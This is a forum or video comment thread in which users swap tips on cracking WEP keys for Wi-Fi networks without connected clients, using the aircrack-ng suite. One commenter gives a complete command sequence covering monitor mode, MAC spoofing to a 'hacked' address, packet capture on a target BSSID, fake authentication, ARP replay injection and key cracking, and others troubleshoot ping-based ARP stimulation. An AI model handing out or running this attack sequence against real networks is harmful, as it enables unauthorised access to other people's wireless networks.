fifothekid asked:
This attack can be used on a clientless network Usually capturing a packet takes some time, but I had to stimulate an ARP packet by issuing a ping to an unavailable local IP from a wired client This video is based on: forums.remote-exploit.org
Advertisement
may be your router is not vulnerable to this attack
consult the forum for other alternatives
@ross817 Hmmm… if I wait long enough I start to get quite a few ARPs, but no IVs.
Anyone have an alternative way of generating arp requests? Pinging unavailable hosts doesn’t work for me, apparently.
I was pinging to stimulate activity in the network
Normally, you wouldn’t need to do that but you’ll have to wait for some WIRED activity inside the network
And the mac im spoofing to 68:61:63:6b:65:64 is the text “hacked” in hex 😛
I dont know what you were doing with the ping but this is how i would do it..
airmon-ng
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger -m 68:61:63:6b:65:64 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c 11 -w haxor –bssid attackingbssid.. wlan0
aireplay-ng -1 0 -a attackingbssid -h 68:61:63:6b:65:64 -e NamelikeDemo wlan0
aireplay-ng -3 -b attackingbssid -h 68:61:63:6b:65:64 wlan0
aircrack-ng -n 64 -b attackingbssid… haxor-01.cap
the spacing means a different konsole.
Btw bro, you have msn ? is better off we chat there.
Serious shiit? That will be dam elite.
I’m not really sure, but the aircrack-ng team is working on a program that will allow you to connect to WEP network without knowing the key!!!
May be that can work
oh! that’s how you ping. Thank’s alot. But is there any ways to ping during wep clientless without wired?
the computer was already connected using a wire, and the wifi card was used for cracking
bro, i have a question for you. How do you capable to ping when you’re not connected yet?
Pinging is not a part of the tutorial
The point is, there should be at least one ARP packet coming from the router
This thing can take one minute to an hour
For the purpose of this tutorial, the computer was connecting using a wire to the router, then I issued a ping to a random IP, so that the router will generate an ARP packet
“but I had to stimulate an ARP packet by issuing a ping to an unavailable local IP from a wired client”
I’m a little stumped about this as well. Could you elaborate on this please?
I’m having the same problem as clriggs. After you execute the ARP replay you ping 192.168.254.254 then 192.168.254.253 and packets start flying like crazy. When I try this I recieve “Network is unreachable” ??
Pinging what?
During this tutorial you are not connected to any network
Only a client is connected to you thinking that you are an access point
I’m getting “Network is unreachable” when trying to ping…any ideas?